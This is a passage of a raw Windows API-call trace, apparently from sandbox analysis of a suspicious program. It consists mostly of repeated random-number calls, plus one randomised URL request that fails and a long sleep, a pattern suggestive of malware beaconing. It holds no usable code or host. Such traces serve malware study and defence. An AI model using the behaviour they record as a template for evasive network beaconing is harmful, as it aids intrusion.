cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.170] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.170] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0195.170] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.171] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.171] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.171] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.171] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.172] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0195.172] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e7b, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x4d5e7b) returned 0x0 [0195.172] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.173] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.173] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.173] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.173] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.174] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.174] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.174] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.174] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.176] GetProcessHeap () returned 0x440000 [0195.176] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0195.176] lstrcpyA (in: lpString1=0x472b10, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0195.176] lstrcatA (in: lpString1="\x04", lpString2="/jvnqkrSmnd63wol0rxtckmx8aCYM8p2ohqgMh/y35qyiiq0lud6J4didnft0ha7w/buitew17f92D65pw9K1d5i68/i5ahoEmLiTjbjDxfcjB/" | out: lpString1="\x04/jvnqkrSmnd63wol0rxtckmx8aCYM8p2ohqgMh/y35qyiiq0lud6J4didnft0ha7w/buitew17f92D65pw9K1d5i68/i5ahoEmLiTjbjDxfcjB/") returned="\x04/jvnqkrSmnd63wol0rxtckmx8aCYM8p2ohqgMh/y35qyiiq0lud6J4didnft0ha7w/buitew17f92D65pw9K1d5i68/i5ahoEmLiTjbjDxfcjB/" [0195.176] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0195.176] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/jvnqkrSmnd63wol0rxtckmx8aCYM8p2ohqgMh/y35qyiiq0lud6J4didnft0ha7w/buitew17f92D65pw9K1d5i68/i5ahoEmLiTjbjDxfcjB/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0195.177] GetProcessHeap () returned 0x440000 [0195.177] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0195.177] GetProcessHeap () returned 0x440000 [0195.177] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5e20 | out: hHeap=0x440000) returned 1 [0195.177] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0195.177] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0195.178] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0195.178] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0195.178] Sleep (dwMilliseconds=0x1b15d) [0196.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0196.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0196.088] GetProcessHeap () returned 0x440000 [0196.088] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02650 [0196.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0196.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02651, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a02651) returned 0x0 [0196.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.091] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0196.091] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.091] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.093] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.093] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.093] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.093] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.094] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.094] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.094] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.095] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.095] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.095] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.095] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0196.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02665, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a02665) returned 0x0 [0196.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0196.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0267f, cbBuffer=0x20, dwFlags=0x2 | out: pbBuffer=0x3a0267f) returned 0x0 [0196.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, 